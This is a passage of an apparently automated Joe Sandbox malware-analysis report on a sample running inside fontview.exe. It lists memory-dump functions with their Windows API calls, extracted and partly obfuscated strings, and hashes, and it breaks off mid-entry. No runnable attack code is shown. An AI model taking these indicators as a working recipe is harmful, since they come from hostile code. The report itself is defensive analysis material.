RtlAllocateHeap.NTDLL(00181A59,?,00195FF7,00181A59,001956DF,00195FF7,?,00181A59,001956DF,00001000,?,?,00000000), ref: 0019989F

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1e4350b7d44d6a684fffbbc4693371c34b8573f8f32981f1b3782ec455faae52
Instruction ID: 1ab59fda169b546e05c99e72ce34545907a53e81d345e34080def09833d6f612
Opcode Fuzzy Hash: 1e4350b7d44d6a684fffbbc4693371c34b8573f8f32981f1b3782ec455faae52
Instruction Fuzzy Hash: 0CE06DB2200204BBDA14EF98DC41F9B77ACEFC5710F004509F908A7241C770B810C6B5

Function 001998B0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,9C43F5A5,00000007,00000000,00000004,00000000,00183DF1,000000F4), ref: 001998EC

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: db2d3549d1a8baec21659a79dd3a681137d7f9f8529d6d7c189c3593deaec9d3
Instruction ID: 69d91eece537835a1fb38abd2d09bfc6f2d3f1a567cbb474f48d1019b34d74d4
Opcode Fuzzy Hash: db2d3549d1a8baec21659a79dd3a681137d7f9f8529d6d7c189c3593deaec9d3
Instruction Fuzzy Hash: 6AE06D752002087FCA14EE58DC41F9B37ADEFC9754F008409F908A7241C770B81086B5

Function 00188390 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 001883BC

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d32f6238646c215bbe379d6b1012a2a828977e3ef01cb35ae5343137385450a7
Instruction ID: 79415fab7f343977a0bc0a3ff5deea2388656b7d559ce5d757049471a1f443d6
Opcode Fuzzy Hash: d32f6238646c215bbe379d6b1012a2a828977e3ef01cb35ae5343137385450a7
Instruction Fuzzy Hash: C8E0207114020427FB247978DC46F65334C6744B60F440650BD1CCB1C1EA74FA414650

Function 00188177 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00181D50,0019801F,001956DF,00181D1D), ref: 001881B3

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 1a7df83a96736bb8b42a6f9f8dee6f2399eeca2e5ecf2d0bc1e9b2b67b9d689a
Instruction ID: 853d32b525396761a57c83b95b9e15461a65fbe4a8f8419e01e38a92ed010ada
Opcode Fuzzy Hash: 1a7df83a96736bb8b42a6f9f8dee6f2399eeca2e5ecf2d0bc1e9b2b67b9d689a
Instruction Fuzzy Hash: 5AE0C271A803043BF648BBF48C0BF9A324897153E0F454124FB4CDB2C2EE95A612C7A9

Function 00188389 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 001883BC

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7554e187af84238c810bd0760d366046ffd29d932187f96caa87466eb38f9b61
Instruction ID: 3f093b2c8942563d83e60ad8389446f0b4bcc276f20c8c08b24710bbf5bf815e
Opcode Fuzzy Hash: 7554e187af84238c810bd0760d366046ffd29d932187f96caa87466eb38f9b61
Instruction Fuzzy Hash: FFE0207150030437E6247A68CC86FA53309AB44B60F840650BD18DB1C1EA78FE414754

Function 00180E14 Relevance: 1.5, APIs: 1, Instructions: 23threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 00180E2D

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 0676283f2edab68e17f1bc87d68dc1ac5174b1ef46bdf3201dca33da9374f79e
Instruction ID: 851aba368d087ffa4346fa9946cc0f1adf98bf14d472a3221780739d20b73eed
Opcode Fuzzy Hash: 0676283f2edab68e17f1bc87d68dc1ac5174b1ef46bdf3201dca33da9374f79e
Instruction Fuzzy Hash: 25D05E66B4020C34EA2295B5AD42FFF7B6C8BA5A40F1001ABFB44F40C6D78096094BA6

Function 00188180 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00181D50,0019801F,001956DF,00181D1D), ref: 001881B3

Memory Dump Source

Source File: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_170000_fontview.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 26abb4eef00584e0f636b11f0a4fd218ca792f851f44d5d62d3d6bc23dca74c7
Instruction ID: 607c98c505ee4efba5f3e8596efc02f352c194e841ad487847638d7b27178a05
Opcode Fuzzy Hash: 26abb4eef00584e0f636b11f0a4fd218ca792f851f44d5d62d3d6bc23dca74c7
Instruction Fuzzy Hash: A1D05E726803047BF600A7F4CC4BF56328C9B147A0F454068BA0CDB2C2EE55F55186A9

Function 04402C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04402C24

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5e7a66fbb8771340e26aaad6abe52e59d1bd3d0f9bb281a43b7e24c962b409fb
Instruction ID: c9737708b04c1c3a8971e176160091085744c0d39d089017a58a1dc70894942a
Opcode Fuzzy Hash: 5e7a66fbb8771340e26aaad6abe52e59d1bd3d0f9bb281a43b7e24c962b409fb
Instruction Fuzzy Hash: 6CB04C719455C586EE11A760460861779006BD1745F15C067D2021696A4778D591E175

Non-executed Functions

Function 0425DEE8 Relevance: 56.5, Strings: 45, Instructions: 209COMMON

Download Yara Rule

Strings

@@@@, xrefs: 0425E087
@@@?, xrefs: 0425DF53
@@@@, xrefs: 0425E002
@@@@, xrefs: 0425E0BF
@@@@, xrefs: 0425E05D
@@@@, xrefs: 0425E048
%&'(, xrefs: 0425DFC3
@@@@, xrefs: 0425DFFB
@@@@, xrefs: 0425E06B
@@@@, xrefs: 0425DF6F
@@@@, xrefs: 0425E095
@@@@, xrefs: 0425DFDF
@@@@, xrefs: 0425E033
@@@@, xrefs: 0425E0B1
@@@@, xrefs: 0425E025
@@@@, xrefs: 0425E01E
@@@@, xrefs: 0425E041
@@@@, xrefs: 0425E064
123@, xrefs: 0425DFD8
@@@@, xrefs: 0425E0B8
<=@@, xrefs: 0425DF68
@@@@, xrefs: 0425E010
@@@@, xrefs: 0425E009
@@@@, xrefs: 0425E079
@@@@, xrefs: 0425E09C
@@@@, xrefs: 0425E0A3
@@@@, xrefs: 0425E072
!"#$, xrefs: 0425DFBC
@@@@, xrefs: 0425DFA7
@@@@, xrefs: 0425E017
@@@@, xrefs: 0425E02C
89:;, xrefs: 0425DF61
@@@@, xrefs: 0425DFF4
@@@@, xrefs: 0425E0AA
@@@@, xrefs: 0425E03A
-./0, xrefs: 0425DFD1
@@@@, xrefs: 0425DFE6
4567, xrefs: 0425DF5A
?, xrefs: 0425E0D0
@@@@, xrefs: 0425E04F
@@@@, xrefs: 0425DFED
@@@@, xrefs: 0425E056
@@@@, xrefs: 0425E08E
@@@@, xrefs: 0425E080
)*+,, xrefs: 0425DFCA

Memory Dump Source

Source File: 0000000C.00000002.3128072326.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4250000_fontview.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
Instruction ID: 2d730d7e3b6c93ac103953f126918c2bda94d590bf42190555367a124bbb31bb
Opcode Fuzzy Hash: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
Instruction Fuzzy Hash: C8914FF04182988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB95

Function 04253AFF Relevance: 38.8, Strings: 31, Instructions: 65COMMON

Download Yara Rule

Strings

6<>+, xrefs: 04253B5D
'23d, xrefs: 04253B6B
'23s, xrefs: 04253B4F
>8:p, xrefs: 04253B80
.boq, xrefs: 04253B72
s62>, xrefs: 04253B8E
:d)b, xrefs: 04253BE2
upud, xrefs: 04253BA3
gs>/, xrefs: 04253BB1
1p,6, xrefs: 04253BC6
(:=/, xrefs: 04253B87
1p'7, xrefs: 04253B41
fs62, xrefs: 04253B79
/18s, xrefs: 04253B9C
7>18, xrefs: 04253BDB
r:'<, xrefs: 04253BD4
+23t, xrefs: 04253B48
/36<, xrefs: 04253B33
>+60, xrefs: 04253B3A
8:p>, xrefs: 04253B95
3s>/, xrefs: 04253B2C
.boq, xrefs: 04253BAA
/36<, xrefs: 04253BB8
=ld., xrefs: 04253BE9
boqh, xrefs: 04253BF0
81:;, xrefs: 04253BCD
p7+2, xrefs: 04253B20
601p, xrefs: 04253B64
>+60, xrefs: 04253BBF
+:'+, xrefs: 04253B19
>//3, xrefs: 04253B56

Memory Dump Source

Source File: 0000000C.00000002.3128072326.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4250000_fontview.jbxd

Similarity

API ID:
String ID: '23d$'23s$(:=/$+23t$+:'+$.boq$.boq$/18s$/36<$/36<$1p'7$1p,6$3s>/$601p$6<>+$7>18$81:;$8:p>$:d)b$=ld.$>+60$>+60$>//3$>8:p$boqh$fs62$gs>/$p7+2$r:'<$s62>$upud
API String ID: 0-4032701122
Opcode ID: 1dda372f729bcb1b56a03cbe21a9e7f04ec697589b672d1890308a6c4af75946
Instruction ID: a3316aab4f310c6f8a28edb113d1ccc4b6ee2d35799d510661d0216f648869f7
Opcode Fuzzy Hash: 1dda372f729bcb1b56a03cbe21a9e7f04ec697589b672d1890308a6c4af75946
Instruction Fuzzy Hash: 2A3146B841874DDBCB24DF80E580ADDBBB0FF04344F80A159E8496F349C6768666CB8A

Function 04402890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0440293C
___swprintf_l.LIBCMT ref: 0440295E
___swprintf_l.LIBCMT ref: 044029A3
___swprintf_l.LIBCMT ref: 0443A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 0443A527
ffff:, xrefs: 0443A504
::ffff:0:%u.%u.%u.%u, xrefs: 0443A54E
:%u.%u.%u.%u, xrefs: 0443A5B8

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 2ff9ed5b0d75a590afdcf7e1c53947cfd22601529c248278a2e1c229565ff54c
Instruction ID: 551c53fbad9239f17329e4cc921e3cba2a2802547ea12119ba0d587d1af20b38
Opcode Fuzzy Hash: 2ff9ed5b0d75a590afdcf7e1c53947cfd22601529c248278a2e1c229565ff54c
Instruction Fuzzy Hash: 3951D6B6B00516BFDF21DF58988497EF7B8BB08205714C26BE495D76C1E274FE508BA0

Function 04472410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 044724A6
___swprintf_l.LIBCMT ref: 044724E2
___swprintf_l.LIBCMT ref: 0447257D
___swprintf_l.LIBCMT ref: 044725A3
___swprintf_l.LIBCMT ref: 044725C8
___swprintf_l.LIBCMT ref: 04472608

Strings

:%u.%u.%u.%u, xrefs: 044725FF
ffff:, xrefs: 0447247D, 0447249D
::ffff:0:%u.%u.%u.%u, xrefs: 044724DA
::%hs%u.%u.%u.%u, xrefs: 0447249E

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 50d2fd96be07df4b41cb2b4027503ae11bc9d49de39759c4100747f84396f8fa
Instruction ID: e94fed7944a8edfc0cd265720a49bb432ff9e9bd1884761c42feda551b2603a6
Opcode Fuzzy Hash: 50d2fd96be07df4b41cb2b4027503ae11bc9d49de39759c4100747f84396f8fa
Instruction Fuzzy Hash: F6510371A00655AFDF30DE6CC9909BFB7F8FB44204B00849BE4D6D3641E6B4FA418BA0

Function 043F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 04434713
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04434742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04434655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 044346FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04434725
CLIENT(ntdll): Processing section info %ws..., xrefs: 04434787
ExecuteOptions, xrefs: 044346A0

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: f2feccbf8aca79164aa525c5c3b52cc14017cd16e74391958ddd8a43107d2ea2
Instruction ID: cd5eadc1723a65e3294ab13deed2b5d45523249607fec8804486b417599b3d30
Opcode Fuzzy Hash: f2feccbf8aca79164aa525c5c3b52cc14017cd16e74391958ddd8a43107d2ea2
Instruction Fuzzy Hash: 6051F6316402196BFF20ABA5EC85FBA77A8EF08705F0410AAE605A71D1EB71BE558F50

Function 04496940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 3254166f07f34a25da0d96104650d9cfc6fe93705b90ca4f6129387b997afe5f
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 45023470508341AFDB05CF19C890A6FBBE5EFC8714F058A2EF9898B265DB31E905DB42

Function 0440B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0440B6BF

Strings

0, xrefs: 0440B695
+, xrefs: 0440B65A
0, xrefs: 0440B66F
-, xrefs: 0440B650

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 06ba6b7d771176aeff426dee150748270250d1c3170daa9029e9b62fe86b45f3
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 5581B230E052898ADF288EE8C8507BE7BB1EF85310F18C97BD851A73D1C634B8618B59

Function 044720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0447214F
___swprintf_l.LIBCMT ref: 04472172

Strings

]:%u, xrefs: 04472169
%%%u, xrefs: 04472146
[, xrefs: 0447212B

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 04c56da0fa97f5c0e533fe5cdc81ae190cce609f2fbf440fbef76b08f3599359
Instruction ID: 365151ab007458dc3fa10f8f8d4a5e502fb6d36c1797eb0b1f3842c96aa0b558
Opcode Fuzzy Hash: 04c56da0fa97f5c0e533fe5cdc81ae190cce609f2fbf440fbef76b08f3599359
Instruction Fuzzy Hash: 8D214176A00159ABDF10DEA9D844AEF7BE8FF44685F04416BE945E3241E670E9028BA1

Function 043EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0443031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044302E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044302BD

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: fecf9231c32ea4ad6f4df6e0f101a97cbae8093df28615b26e4c70f195eac9bf
Instruction ID: bc633ea66c63bbe7667352390485bde01a10191530fbd58ac6e13b21f3132258
Opcode Fuzzy Hash: fecf9231c32ea4ad6f4df6e0f101a97cbae8093df28615b26e4c70f195eac9bf
Instruction Fuzzy Hash: ACE1BE30605741EFEB24CF29C884B2AB7E0BF88714F144A6EE5A58B6D1D7B4F845CB42

Function 043FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 04437BAC
RTL: Resource at %p, xrefs: 04437B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04437B7F

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: d6099cf421a7d0c96805398ac803dc6c856edda0950e81b7afd60bd2f585e296
Instruction ID: 5541f9d9d4896c6d8731928ddd70358d3adc2c9aba2f170b1b4a5a4d81349760
Opcode Fuzzy Hash: d6099cf421a7d0c96805398ac803dc6c856edda0950e81b7afd60bd2f585e296
Instruction Fuzzy Hash: D041E2757007029FEB24DE25DC40B6BB7E5EF88715F100A2EEA969B681DB31F8058B91

Function 043FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0443728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04437294
RTL: Re-Waiting, xrefs: 044372C1
RTL: Resource at %p, xrefs: 044372A3

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 574da246ad382657a98e287f8dae469c0a4c8a79f4b4b212af3bb906dfaff9f4
Instruction ID: b9ed45197898adbf4676aaf0393a00b9569721506774775b41e0cd7257734fac
Opcode Fuzzy Hash: 574da246ad382657a98e287f8dae469c0a4c8a79f4b4b212af3bb906dfaff9f4
Instruction Fuzzy Hash: F54107B1700602AFDB20DE25CC41F66F7A5FB48B15F10461AF995A7781DB31F8168BD1

Function 04472300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0447238D
___swprintf_l.LIBCMT ref: 044723B3

Strings

]:%u, xrefs: 044723AA
%%%u, xrefs: 04472384

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 80f121f80b7d607e8b546f2d91b5c9ac6734e0311b3ce212b4130432ac2a4f24
Instruction ID: a5677a8c28dc84dc96a750b02259bac31bb65bbbb61cb776624fe24582a48670
Opcode Fuzzy Hash: 80f121f80b7d607e8b546f2d91b5c9ac6734e0311b3ce212b4130432ac2a4f24
Instruction Fuzzy Hash: 19314372A002299FDF60DE39DC40BEF77A8FB44614F44459BE849E3241EF70BA558BA1

Function 04407D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04407E8B

Strings

-, xrefs: 04407DDD
+, xrefs: 04407DE8

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 6eaf6812d2d91391ce66195cedcdae52d6a5a2f93638f5fbb47cd9a0bdf5249d
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 96918370E002159BEF24DF69C981ABFB7A5AF44760F14C53BE855A73C0E730B9618B62

Function 043C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 043C9191
@, xrefs: 043C9175

Memory Dump Source

Source File: 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000C.00000002.3128204993.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4390000_fontview.jbxd

Similarity

API ID:
